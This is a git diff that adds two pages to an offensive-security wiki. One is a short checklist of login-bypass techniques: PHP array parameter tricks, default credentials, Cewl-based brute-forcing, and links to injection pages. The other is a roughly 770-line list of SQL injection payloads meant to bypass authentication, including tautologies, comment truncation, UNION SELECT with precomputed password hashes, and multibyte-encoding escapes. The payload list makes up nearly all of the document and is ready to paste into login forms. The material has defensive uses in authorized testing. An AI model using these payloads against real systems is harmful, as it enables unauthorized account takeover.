GitBook: [master] 5 pages modified
parent
f48e8ccacf
commit
fd9418521e
@ -376,6 +376,8 @@
|
||||
* [JWT Vulnerabilities \(Json Web Tokens\)](pentesting-web/hacking-jwt-json-web-tokens.md)
|
||||
* [NoSQL injection](pentesting-web/nosql-injection.md)
|
||||
* [LDAP Injection](pentesting-web/ldap-injection.md)
|
||||
* [Login Bypass](pentesting-web/login-bypass/README.md)
|
||||
* [SQL Login bypass](pentesting-web/login-bypass/sql-login-bypass.md)
|
||||
* [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md)
|
||||
* [Open Redirect](pentesting-web/open-redirect.md)
|
||||
* [Parameter Pollution](pentesting-web/parameter-pollution.md)
|
||||
|
41
pentesting-web/login-bypass/README.md
Normal file
@ -0,0 +1,41 @@
|
||||
# Login Bypass
|
||||
|
||||
## **Bypass regular login**
|
||||
|
||||
If you find a login page, here you can find some techniques to try to bypass it:
|
||||
|
||||
* Check for **comments** inside the page \(scroll down and to the right?\)
|
||||
* Check if you can **directly access the restricted pages**
|
||||
* Check to **not send the parameters** \(do not send any or only 1\)
|
||||
* Check the **PHP comparisons error:** _user\[\]=a&pwd=b_ , _user=a&pwd\[\]=b_ , _user\[\]=a&pwd\[\]=b_
|
||||
* Check credentials:
|
||||
* [**Default credentials**](../../brute-force.md#default-credentials) ****of the technology/platform used
|
||||
* **Common combinations** \(root, admin, password, name of the tech, default user with one of these passwords\).
|
||||
* Create a dictionary using **Cewl**, **add** the **default** username and password \(if there is\) and try to brute-force it using all the words as **usernames and password**
|
||||
* **Brute-force** using a bigger **dictionary \(**[**Brute force**](../../brute-force.md#http-post-form)**\)**
|
||||
|
||||
### SQL Injection authentication bypass
|
||||
|
||||
[Here you can find several tricks to bypass the login via **SQL injections**](../sql-injection/#authentication-bypass).
|
||||
|
||||
In the following page you can find a **custom list to try to bypass login** via SQL Injections:
|
||||
|
||||
{% page-ref page="sql-login-bypass.md" %}
|
||||
|
||||
### No SQL Injection authentication bypass
|
||||
|
||||
[Here you can find several tricks to bypass the login via **No SQL Injections.**](../nosql-injection.md#basic-authentication-bypass)\*\*\*\*
|
||||
|
||||
As the NoSQL Injections requires to change the parameters value, you will need to test them manually.
|
||||
|
||||
### XPath Injection authentication bypass
|
||||
|
||||
|
||||
|
||||
##
|
||||
|
||||
|
||||
|
||||
* [**XPath Injection**](../xpath-injection.md)
|
||||
* [**LDAP Injection**](../ldap-injection.md)
|
||||
|
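Review bot: The `### XPath Injection authentication bypass` section has no body and is followed by an empty `##` heading, which leaves the XPath Injection and LDAP Injection links hanging under a blank title. Drop the stray `##`, move the XPath link under its own heading, and give the LDAP link a matching `### LDAP Injection authentication bypass` heading. Smaller points in the same file: the Default credentials bullet carries a stray `****` after the link and the NoSQL link line ends in `\*\*\*\*`, both of which will render as literal asterisks; "As the NoSQL Injections requires to change the parameters value" should read "As NoSQL injections require changing the parameter values"; and the PHP comparisons bullet lists the array-parameter forms without saying which comparison they are meant to exercise, so a one-line explanation would help readers.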
779
pentesting-web/login-bypass/sql-login-bypass.md
Normal file
@ -0,0 +1,779 @@
|
||||
# SQL Login bypass
|
||||
|
||||
```text
|
||||
1234
|
||||
'-'
|
||||
' '
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
' or ''-'
|
||||
' or '' '
|
||||
' or ''&'
|
||||
' or ''^'
|
||||
' or ''*'
|
||||
"-"
|
||||
" "
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
" or ""-"
|
||||
" or "" "
|
||||
" or ""&"
|
||||
" or ""^"
|
||||
" or ""*"
|
||||
or true--
|
||||
" or true--
|
||||
' or true--
|
||||
") or true--
|
||||
') or true--
|
||||
' or 'x'='x
|
||||
') or ('x')=('x
|
||||
')) or (('x'))=(('x
|
||||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
or 1=1/*
|
||||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
admin' or '1'='1'/*
|
||||
admin'or 1=1 or ''='
|
||||
admin' or 1=1
|
||||
admin' or 1=1--
|
||||
admin' or 1=1#
|
||||
admin' or 1=1/*
|
||||
admin') or ('1'='1
|
||||
admin') or ('1'='1'--
|
||||
admin') or ('1'='1'#
|
||||
admin') or ('1'='1'/*
|
||||
admin') or '1'='1
|
||||
admin') or '1'='1'--
|
||||
admin') or '1'='1'#
|
||||
admin') or '1'='1'/*
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
|
||||
admin" --
|
||||
admin" #
|
||||
admin"/*
|
||||
admin" or "1"="1
|
||||
admin" or "1"="1"--
|
||||
admin" or "1"="1"#
|
||||
admin" or "1"="1"/*
|
||||
admin"or 1=1 or ""="
|
||||
admin" or 1=1
|
||||
admin" or 1=1--
|
||||
admin" or 1=1#
|
||||
admin" or 1=1/*
|
||||
admin") or ("1"="1
|
||||
admin") or ("1"="1"--
|
||||
admin") or ("1"="1"#
|
||||
admin") or ("1"="1"/*
|
||||
admin") or "1"="1
|
||||
admin") or "1"="1"--
|
||||
admin") or "1"="1"#
|
||||
admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
|
||||
==
|
||||
=
|
||||
'
|
||||
' --
|
||||
' #
|
||||
' –
|
||||
'--
|
||||
'/*
|
||||
'#
|
||||
" --
|
||||
" #
|
||||
"/*
|
||||
' and 1='1
|
||||
' and a='a
|
||||
or true
|
||||
' or ''='
|
||||
" or ""="
|
||||
1′) and '1′='1–
|
||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
|
||||
" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
|
||||
and 1=1
|
||||
and 1=1–
|
||||
' and 'one'='one
|
||||
' and 'one'='one–
|
||||
' group by password having 1=1--
|
||||
' group by userid having 1=1--
|
||||
' group by username having 1=1--
|
||||
like '%'
|
||||
or 0=0 --
|
||||
or 0=0 #
|
||||
or 0=0 –
|
||||
' or 0=0 #
|
||||
' or 0=0 --
|
||||
' or 0=0 #
|
||||
' or 0=0 –
|
||||
" or 0=0 --
|
||||
" or 0=0 #
|
||||
" or 0=0 –
|
||||
%' or '0'='0
|
||||
or 1=1–
|
||||
' or 1=1--
|
||||
' or '1'='1
|
||||
' or '1'='1'--
|
||||
' or '1'='1'/*
|
||||
' or '1'='1'#
|
||||
' or '1′='1
|
||||
' or 1=1
|
||||
' or 1=1 --
|
||||
' or 1=1 –
|
||||
' or 1=1;#
|
||||
' or 1=1/*
|
||||
' or 1=1#
|
||||
' or 1=1–
|
||||
') or '1'='1
|
||||
') or '1'='1--
|
||||
') or '1'='1'--
|
||||
') or '1'='1'/*
|
||||
') or '1'='1'#
|
||||
') or ('1'='1
|
||||
') or ('1'='1--
|
||||
') or ('1'='1'--
|
||||
') or ('1'='1'/*
|
||||
') or ('1'='1'#
|
||||
'or'1=1
|
||||
'or'1=1′
|
||||
" or "1"="1
|
||||
" or "1"="1"--
|
||||
" or "1"="1"/*
|
||||
" or "1"="1"#
|
||||
" or 1=1
|
||||
" or 1=1 --
|
||||
" or 1=1 –
|
||||
" or 1=1--
|
||||
" or 1=1/*
|
||||
" or 1=1#
|
||||
" or 1=1–
|
||||
") or "1"="1
|
||||
") or "1"="1"--
|
||||
") or "1"="1"/*
|
||||
") or "1"="1"#
|
||||
") or ("1"="1
|
||||
") or ("1"="1"--
|
||||
") or ("1"="1"/*
|
||||
") or ("1"="1"#
|
||||
) or '1′='1–
|
||||
) or ('1′='1–
|
||||
' or 1=1 LIMIT 1;#
|
||||
'or 1=1 or ''='
|
||||
"or 1=1 or ""="
|
||||
' or 'a'='a
|
||||
' or a=a--
|
||||
' or a=a–
|
||||
') or ('a'='a
|
||||
" or "a"="a
|
||||
") or ("a"="a
|
||||
') or ('a'='a and hi") or ("a"="a
|
||||
' or 'one'='one
|
||||
' or 'one'='one–
|
||||
' or uid like '%
|
||||
' or uname like '%
|
||||
' or userid like '%
|
||||
' or user like '%
|
||||
' or username like '%
|
||||
') or ('x'='x
|
||||
' OR 'x'='x'#;
|
||||
'=' 'or' and '=' 'or'
|
||||
' UNION ALL SELECT 1, @@version;#
|
||||
' UNION ALL SELECT system_user(),user();#
|
||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
||||
admin' and substring(password/text(),1,1)='7
|
||||
' and substring(password/text(),1,1)='7
|
||||
"
|
||||
'-- 2
|
||||
"-- 2
|
||||
'='
|
||||
0'<'2
|
||||
"="
|
||||
0"<"2
|
||||
')
|
||||
")
|
||||
')-- 2
|
||||
')/*
|
||||
')#
|
||||
")-- 2
|
||||
") #
|
||||
")/*
|
||||
')-('
|
||||
')&('
|
||||
')^('
|
||||
')*('
|
||||
')=('
|
||||
0')<('2
|
||||
")-("
|
||||
")&("
|
||||
")^("
|
||||
")*("
|
||||
")=("
|
||||
0")<("2
|
||||
'-''-- 2
|
||||
'-''#
|
||||
'-''/*
|
||||
'&''-- 2
|
||||
'&''#
|
||||
'&''/*
|
||||
'^''-- 2
|
||||
'^''#
|
||||
'^''/*
|
||||
'*''-- 2
|
||||
'*''#
|
||||
'*''/*
|
||||
'=''-- 2
|
||||
'=''#
|
||||
'=''/*
|
||||
0'<'2'-- 2
|
||||
0'<'2'#
|
||||
0'<'2'/*
|
||||
"-""-- 2
|
||||
"-""#
|
||||
"-""/*
|
||||
"&""-- 2
|
||||
"&""#
|
||||
"&""/*
|
||||
"^""-- 2
|
||||
"^""#
|
||||
"^""/*
|
||||
"*""-- 2
|
||||
"*""#
|
||||
"*""/*
|
||||
"=""-- 2
|
||||
"=""#
|
||||
"=""/*
|
||||
0"<"2"-- 2
|
||||
0"<"2"#
|
||||
0"<"2"/*
|
||||
')-''-- 2
|
||||
')-''#
|
||||
')-''/*
|
||||
')&''-- 2
|
||||
')&''#
|
||||
')&''/*
|
||||
')^''-- 2
|
||||
')^''#
|
||||
')^''/*
|
||||
')*''-- 2
|
||||
')*''#
|
||||
')*''/*
|
||||
')=''-- 2
|
||||
')=''#
|
||||
')=''/*
|
||||
0')<'2'-- 2
|
||||
0')<'2'#
|
||||
0')<'2'/*
|
||||
")-""-- 2
|
||||
")-""#
|
||||
")-""/*
|
||||
")&""-- 2
|
||||
")&""#
|
||||
")&""/*
|
||||
")^""-- 2
|
||||
")^""#
|
||||
")^""/*
|
||||
")*""-- 2
|
||||
")*""#
|
||||
")*""/*
|
||||
")=""-- 2
|
||||
")=""#
|
||||
")=""/*
|
||||
0")<"2-- 2
|
||||
0")<"2#
|
||||
0")<"2/*
|
||||
'oR'2
|
||||
'oR'2'-- 2
|
||||
'oR'2'#
|
||||
'oR'2'/*
|
||||
'oR'2'oR'
|
||||
'oR(2)-- 2
|
||||
'oR(2)#
|
||||
'oR(2)/*
|
||||
'oR(2)oR'
|
||||
'oR 2-- 2
|
||||
'oR 2#
|
||||
'oR 2/*
|
||||
'oR 2 oR'
|
||||
'oR/**/2-- 2
|
||||
'oR/**/2#
|
||||
'oR/**/2/*
|
||||
'oR/**/2/**/oR'
|
||||
"oR"2
|
||||
"oR"2"-- 2
|
||||
"oR"2"#
|
||||
"oR"2"/*
|
||||
"oR"2"oR"
|
||||
"oR(2)-- 2
|
||||
"oR(2)#
|
||||
"oR(2)/*
|
||||
"oR(2)oR"
|
||||
"oR 2-- 2
|
||||
"oR 2#
|
||||
"oR 2/*
|
||||
"oR 2 oR"
|
||||
"oR/**/2-- 2
|
||||
"oR/**/2#
|
||||
"oR/**/2/*
|
||||
"oR/**/2/**/oR"
|
||||
'oR'2'='2
|
||||
'oR'2'='2'oR'
|
||||
'oR'2'='2'-- 2
|
||||
'oR'2'='2'#
|
||||
'oR'2'='2'/*
|
||||
'oR 2=2-- 2
|
||||
'oR 2=2#
|
||||
'oR 2=2/*
|
||||
'oR 2=2 oR'
|
||||
'oR/**/2=2-- 2
|
||||
'oR/**/2=2#
|
||||
'oR/**/2=2/*
|
||||
'oR/**/2=2/**/oR'
|
||||
'oR(2)=2-- 2
|
||||
'oR(2)=2#
|
||||
'oR(2)=2/*
|
||||
'oR(2)=(2)oR'
|
||||
'oR'2'='2' LimIT 1-- 2
|
||||
'oR'2'='2' LimIT 1#
|
||||
'oR'2'='2' LimIT 1/*
|
||||
'oR(2)=(2)LimIT(1)-- 2
|
||||
'oR(2)=(2)LimIT(1)#
|
||||
'oR(2)=(2)LimIT(1)/*
|
||||
"oR"2"="2
|
||||
"oR"2"="2"oR"
|
||||
"oR"2"="2"-- 2
|
||||
"oR"2"="2"#
|
||||
"oR"2"="2"/*
|
||||
"oR 2=2-- 2
|
||||
"oR 2=2#
|
||||
"oR 2=2/*
|
||||
"oR 2=2 oR"
|
||||
"oR/**/2=2-- 2
|
||||
"oR/**/2=2#
|
||||
"oR/**/2=2/*
|
||||
"oR/**/2=2/**/oR"
|
||||
"oR(2)=2-- 2
|
||||
"oR(2)=2#
|
||||
"oR(2)=2/*
|
||||
"oR(2)=(2)oR"
|
||||
"oR"2"="2" LimIT 1-- 2
|
||||
"oR"2"="2" LimIT 1#
|
||||
"oR"2"="2" LimIT 1/*
|
||||
"oR(2)=(2)LimIT(1)-- 2
|
||||
"oR(2)=(2)LimIT(1)#
|
||||
"oR(2)=(2)LimIT(1)/*
|
||||
'oR true-- 2
|
||||
'oR true#
|
||||
'oR true/*
|
||||
'oR true oR'
|
||||
'oR(true)-- 2
|
||||
'oR(true)#
|
||||
'oR(true)/*
|
||||
'oR(true)oR'
|
||||
'oR/**/true-- 2
|
||||
'oR/**/true#
|
||||
'oR/**/true/*
|
||||
'oR/**/true/**/oR'
|
||||
"oR true-- 2
|
||||
"oR true#
|
||||
"oR true/*
|
||||
"oR true oR"
|
||||
"oR(true)-- 2
|
||||
"oR(true)#
|
||||
"oR(true)/*
|
||||
"oR(true)oR"
|
||||
"oR/**/true-- 2
|
||||
"oR/**/true#
|
||||
"oR/**/true/*
|
||||
"oR/**/true/**/oR"
|
||||
'oR'2'LiKE'2
|
||||
'oR'2'LiKE'2'-- 2
|
||||
'oR'2'LiKE'2'#
|
||||
'oR'2'LiKE'2'/*
|
||||
'oR'2'LiKE'2'oR'
|
||||
'oR(2)LiKE(2)-- 2
|
||||
'oR(2)LiKE(2)#
|
||||
'oR(2)LiKE(2)/*
|
||||
'oR(2)LiKE(2)oR'
|
||||
"oR"2"LiKE"2
|
||||
"oR"2"LiKE"2"-- 2
|
||||
"oR"2"LiKE"2"#
|
||||
"oR"2"LiKE"2"/*
|
||||
"oR"2"LiKE"2"oR"
|
||||
"oR(2)LiKE(2)-- 2
|
||||
"oR(2)LiKE(2)#
|
||||
"oR(2)LiKE(2)/*
|
||||
"oR(2)LiKE(2)oR"
|
||||
admin
|
||||
admin'-- 2
|
||||
admin'#
|
||||
admin"-- 2
|
||||
admin"#
|
||||
ffifdyop
|
||||
' UniON SElecT 1,2-- 2
|
||||
' UniON SElecT 1,2,3-- 2
|
||||
' UniON SElecT 1,2,3,4-- 2
|
||||
' UniON SElecT 1,2,3,4,5-- 2
|
||||
' UniON SElecT 1,2#
|
||||
' UniON SElecT 1,2,3#
|
||||
' UniON SElecT 1,2,3,4#
|
||||
' UniON SElecT 1,2,3,4,5#
|
||||
'UniON(SElecT(1),2)-- 2
|
||||
'UniON(SElecT(1),2,3)-- 2
|
||||
'UniON(SElecT(1),2,3,4)-- 2
|
||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
||||
'UniON(SElecT(1),2)#
|
||||
'UniON(SElecT(1),2,3)#
|
||||
'UniON(SElecT(1),2,3,4)#
|
||||
'UniON(SElecT(1),2,3,4,5)#
|
||||
" UniON SElecT 1,2-- 2
|
||||
" UniON SElecT 1,2,3-- 2
|
||||
" UniON SElecT 1,2,3,4-- 2
|
||||
" UniON SElecT 1,2,3,4,5-- 2
|
||||
" UniON SElecT 1,2#
|
||||
" UniON SElecT 1,2,3#
|
||||
" UniON SElecT 1,2,3,4#
|
||||
" UniON SElecT 1,2,3,4,5#
|
||||
"UniON(SElecT(1),2)-- 2
|
||||
"UniON(SElecT(1),2,3)-- 2
|
||||
"UniON(SElecT(1),2,3,4)-- 2
|
||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
||||
"UniON(SElecT(1),2)#
|
||||
"UniON(SElecT(1),2,3)#
|
||||
"UniON(SElecT(1),2,3,4)#
|
||||
"UniON(SElecT(1),2,3,4,5)#
|
||||
'||'2
|
||||
'||2-- 2
|
||||
'||'2'||'
|
||||
'||2#
|
||||
'||2/*
|
||||
'||2||'
|
||||
"||"2
|
||||
"||2-- 2
|
||||
"||"2"||"
|
||||
"||2#
|
||||
"||2/*
|
||||
"||2||"
|
||||
'||'2'='2
|
||||
'||'2'='2'||'
|
||||
'||2=2-- 2
|
||||
'||2=2#
|
||||
'||2=2/*
|
||||
'||2=2||'
|
||||
"||"2"="2
|
||||
"||"2"="2"||"
|
||||
"||2=2-- 2
|
||||
"||2=2#
|
||||
"||2=2/*
|
||||
"||2=2||"
|
||||
'||2=(2)LimIT(1)-- 2
|
||||
'||2=(2)LimIT(1)#
|
||||
'||2=(2)LimIT(1)/*
|
||||
"||2=(2)LimIT(1)-- 2
|
||||
"||2=(2)LimIT(1)#
|
||||
"||2=(2)LimIT(1)/*
|
||||
'||true-- 2
|
||||
'||true#
|
||||
'||true/*
|
||||
'||true||'
|
||||
"||true-- 2
|
||||
"||true#
|
||||
"||true/*
|
||||
"||true||"
|
||||
'||'2'LiKE'2
|
||||
'||'2'LiKE'2'-- 2
|
||||
'||'2'LiKE'2'#
|
||||
'||'2'LiKE'2'/*
|
||||
'||'2'LiKE'2'||'
|
||||
'||(2)LiKE(2)-- 2
|
||||
'||(2)LiKE(2)#
|
||||
'||(2)LiKE(2)/*
|
||||
'||(2)LiKE(2)||'
|
||||
"||"2"LiKE"2
|
||||
"||"2"LiKE"2"-- 2
|
||||
"||"2"LiKE"2"#
|
||||
"||"2"LiKE"2"/*
|
||||
"||"2"LiKE"2"||"
|
||||
"||(2)LiKE(2)-- 2
|
||||
"||(2)LiKE(2)#
|
||||
"||(2)LiKE(2)/*
|
||||
"||(2)LiKE(2)||"
|
||||
')oR('2
|
||||
')oR'2'-- 2
|
||||
')oR'2'#
|
||||
')oR'2'/*
|
||||
')oR'2'oR('
|
||||
')oR(2)-- 2
|
||||
')oR(2)#
|
||||
')oR(2)/*
|
||||
')oR(2)oR('
|
||||
')oR 2-- 2
|
||||
')oR 2#
|
||||
')oR 2/*
|
||||
')oR 2 oR('
|
||||
')oR/**/2-- 2
|
||||
')oR/**/2#
|
||||
')oR/**/2/*
|
||||
')oR/**/2/**/oR('
|
||||
")oR("2
|
||||
")oR"2"-- 2
|
||||
")oR"2"#
|
||||
")oR"2"/*
|
||||
")oR"2"oR("
|
||||
")oR(2)-- 2
|
||||
")oR(2)#
|
||||
")oR(2)/*
|
||||
")oR(2)oR("
|
||||
")oR 2-- 2
|
||||
")oR 2#
|
||||
")oR 2/*
|
||||
")oR 2 oR("
|
||||
")oR/**/2-- 2
|
||||
")oR/**/2#
|
||||
")oR/**/2/*
|
||||
")oR/**/2/**/oR("
|
||||
')oR'2'=('2
|
||||
')oR'2'='2'oR('
|
||||
')oR'2'='2'-- 2
|
||||
')oR'2'='2'#
|
||||
')oR'2'='2'/*
|
||||
')oR 2=2-- 2
|
||||
')oR 2=2#
|
||||
')oR 2=2/*
|
||||
')oR 2=2 oR('
|
||||
')oR/**/2=2-- 2
|
||||
')oR/**/2=2#
|
||||
')oR/**/2=2/*
|
||||
')oR/**/2=2/**/oR('
|
||||
')oR(2)=2-- 2
|
||||
')oR(2)=2#
|
||||
')oR(2)=2/*
|
||||
')oR(2)=(2)oR('
|
||||
')oR'2'='2' LimIT 1-- 2
|
||||
')oR'2'='2' LimIT 1#
|
||||
')oR'2'='2' LimIT 1/*
|
||||
')oR(2)=(2)LimIT(1)-- 2
|
||||
')oR(2)=(2)LimIT(1)#
|
||||
')oR(2)=(2)LimIT(1)/*
|
||||
")oR"2"=("2
|
||||
")oR"2"="2"oR("
|
||||
")oR"2"="2"-- 2
|
||||
")oR"2"="2"#
|
||||
")oR"2"="2"/*
|
||||
")oR 2=2-- 2
|
||||
")oR 2=2#
|
||||
")oR 2=2/*
|
||||
")oR 2=2 oR("
|
||||
")oR/**/2=2-- 2
|
||||
")oR/**/2=2#
|
||||
")oR/**/2=2/*
|
||||
")oR/**/2=2/**/oR("
|
||||
")oR(2)=2-- 2
|
||||
")oR(2)=2#
|
||||
")oR(2)=2/*
|
||||
")oR(2)=(2)oR("
|
||||
")oR"2"="2" LimIT 1-- 2
|
||||
")oR"2"="2" LimIT 1#
|
||||
")oR"2"="2" LimIT 1/*
|
||||
")oR(2)=(2)LimIT(1)-- 2
|
||||
")oR(2)=(2)LimIT(1)#
|
||||
")oR(2)=(2)LimIT(1)/*
|
||||
')oR true-- 2
|
||||
')oR true#
|
||||
')oR true/*
|
||||
')oR true oR('
|
||||
')oR(true)-- 2
|
||||
')oR(true)#
|
||||
')oR(true)/*
|
||||
')oR(true)oR('
|
||||
')oR/**/true-- 2
|
||||
')oR/**/true#
|
||||
')oR/**/true/*
|
||||
')oR/**/true/**/oR('
|
||||
")oR true-- 2
|
||||
")oR true#
|
||||
")oR true/*
|
||||
")oR true oR("
|
||||
")oR(true)-- 2
|
||||
")oR(true)#
|
||||
")oR(true)/*
|
||||
")oR(true)oR("
|
||||
")oR/**/true-- 2
|
||||
")oR/**/true#
|
||||
")oR/**/true/*
|
||||
")oR/**/true/**/oR("
|
||||
')oR'2'LiKE('2
|
||||
')oR'2'LiKE'2'-- 2
|
||||
')oR'2'LiKE'2'#
|
||||
')oR'2'LiKE'2'/*
|
||||
')oR'2'LiKE'2'oR('
|
||||
')oR(2)LiKE(2)-- 2
|
||||
')oR(2)LiKE(2)#
|
||||
')oR(2)LiKE(2)/*
|
||||
')oR(2)LiKE(2)oR('
|
||||
")oR"2"LiKE("2
|
||||
")oR"2"LiKE"2"-- 2
|
||||
")oR"2"LiKE"2"#
|
||||
")oR"2"LiKE"2"/*
|
||||
")oR"2"LiKE"2"oR("
|
||||
")oR(2)LiKE(2)-- 2
|
||||
")oR(2)LiKE(2)#
|
||||
")oR(2)LiKE(2)/*
|
||||
")oR(2)LiKE(2)oR("
|
||||
admin')-- 2
|
||||
admin')#
|
||||
admin')/*
|
||||
admin")-- 2
|
||||
admin")#
|
||||
') UniON SElecT 1,2-- 2
|
||||
') UniON SElecT 1,2,3-- 2
|
||||
') UniON SElecT 1,2,3,4-- 2
|
||||
') UniON SElecT 1,2,3,4,5-- 2
|
||||
') UniON SElecT 1,2#
|
||||
') UniON SElecT 1,2,3#
|
||||
') UniON SElecT 1,2,3,4#
|
||||
') UniON SElecT 1,2,3,4,5#
|
||||
')UniON(SElecT(1),2)-- 2
|
||||
')UniON(SElecT(1),2,3)-- 2
|
||||
')UniON(SElecT(1),2,3,4)-- 2
|
||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
||||
')UniON(SElecT(1),2)#
|
||||
')UniON(SElecT(1),2,3)#
|
||||
')UniON(SElecT(1),2,3,4)#
|
||||
')UniON(SElecT(1),2,3,4,5)#
|
||||
") UniON SElecT 1,2-- 2
|
||||
") UniON SElecT 1,2,3-- 2
|
||||
") UniON SElecT 1,2,3,4-- 2
|
||||
") UniON SElecT 1,2,3,4,5-- 2
|
||||
") UniON SElecT 1,2#
|
||||
") UniON SElecT 1,2,3#
|
||||
") UniON SElecT 1,2,3,4#
|
||||
") UniON SElecT 1,2,3,4,5#
|
||||
")UniON(SElecT(1),2)-- 2
|
||||
")UniON(SElecT(1),2,3)-- 2
|
||||
")UniON(SElecT(1),2,3,4)-- 2
|
||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
||||
")UniON(SElecT(1),2)#
|
||||
")UniON(SElecT(1),2,3)#
|
||||
")UniON(SElecT(1),2,3,4)#
|
||||
")UniON(SElecT(1),2,3,4,5)#
|
||||
')||('2
|
||||
')||2-- 2
|
||||
')||'2'||('
|
||||
')||2#
|
||||
')||2/*
|
||||
')||2||('
|
||||
")||("2
|
||||
")||2-- 2
|
||||
")||"2"||("
|
||||
")||2#
|
||||
")||2/*
|
||||
")||2||("
|
||||
')||'2'=('2
|
||||
')||'2'='2'||('
|
||||
')||2=2-- 2
|
||||
')||2=2#
|
||||
')||2=2/*
|
||||
')||2=2||('
|
||||
")||"2"=("2
|
||||
")||"2"="2"||("
|
||||
")||2=2-- 2
|
||||
")||2=2#
|
||||
")||2=2/*
|
||||
")||2=2||("
|
||||
')||2=(2)LimIT(1)-- 2
|
||||
')||2=(2)LimIT(1)#
|
||||
')||2=(2)LimIT(1)/*
|
||||
")||2=(2)LimIT(1)-- 2
|
||||
")||2=(2)LimIT(1)#
|
||||
")||2=(2)LimIT(1)/*
|
||||
')||true-- 2
|
||||
')||true#
|
||||
')||true/*
|
||||
')||true||('
|
||||
")||true-- 2
|
||||
")||true#
|
||||
")||true/*
|
||||
")||true||("
|
||||
')||'2'LiKE('2
|
||||
')||'2'LiKE'2'-- 2
|
||||
')||'2'LiKE'2'#
|
||||
')||'2'LiKE'2'/*
|
||||
')||'2'LiKE'2'||('
|
||||
')||(2)LiKE(2)-- 2
|
||||
')||(2)LiKE(2)#
|
||||
')||(2)LiKE(2)/*
|
||||
')||(2)LiKE(2)||('
|
||||
")||"2"LiKE("2
|
||||
")||"2"LiKE"2"-- 2
|
||||
")||"2"LiKE"2"#
|
||||
")||"2"LiKE"2"/*
|
||||
")||"2"LiKE"2"||("
|
||||
")||(2)LiKE(2)-- 2
|
||||
")||(2)LiKE(2)#
|
||||
")||(2)LiKE(2)/*
|
||||
")||(2)LiKE(2)||("
|
||||
' UnION SELeCT 1,2`
|
||||
' UnION SELeCT 1,2,3`
|
||||
' UnION SELeCT 1,2,3,4`
|
||||
' UnION SELeCT 1,2,3,4,5`
|
||||
" UnION SELeCT 1,2`
|
||||
" UnION SELeCT 1,2,3`
|
||||
" UnION SELeCT 1,2,3,4`
|
||||
" UnION SELeCT 1,2,3,4,5`
|
||||
' or 1=1 limit 1 -- -+
|
||||
'="or'
|
||||
Pass1234.
|
||||
Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658
|
||||
Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'#
|
||||
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.
|
||||
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')#
|
||||
Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61
|
||||
Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'#
|
||||
Pass1234.' and 1=0 union select 'admin',sha('Pass1234.
|
||||
Pass1234.' and 1=0 union select 'admin',sha('Pass1234.')#
|
||||
Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658
|
||||
Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"#
|
||||
Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.
|
||||
Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.")#
|
||||
Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61
|
||||
Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61"#
|
||||
Pass1234." and 1=0 union select "admin",sha("Pass1234.
|
||||
Pass1234." and 1=0 union select "admin",sha("Pass1234.")#
|
||||
%A8%27 Or 1=1-- 2
|
||||
%8C%A8%27 Or 1=1-- 2
|
||||
%bf' Or 1=1 -- 2
|
||||
%A8%27 Or 1-- 2
|
||||
%8C%A8%27 Or 1-- 2
|
||||
%bf' Or 1-- 2
|
||||
%A8%27Or(1)-- 2
|
||||
%8C%A8%27Or(1)-- 2
|
||||
%bf'Or(1)-- 2
|
||||
%A8%27||1-- 2
|
||||
%8C%A8%27||1-- 2
|
||||
%bf'||1-- 2
|
||||
%A8%27) Or 1=1-- 2
|
||||
%8C%A8%27) Or 1=1-- 2
|
||||
%bf') Or 1=1 -- 2
|
||||
%A8%27) Or 1-- 2
|
||||
%8C%A8%27) Or 1-- 2
|
||||
%bf') Or 1-- 2
|
||||
%A8%27)Or(1)-- 2
|
||||
%8C%A8%27)Or(1)-- 2
|
||||
%bf')Or(1)-- 2
|
||||
%A8%27)||1-- 2
|
||||
%8C%A8%27)||1-- 2
|
||||
%bf')||1-- 2
|
||||
```
|
||||
|
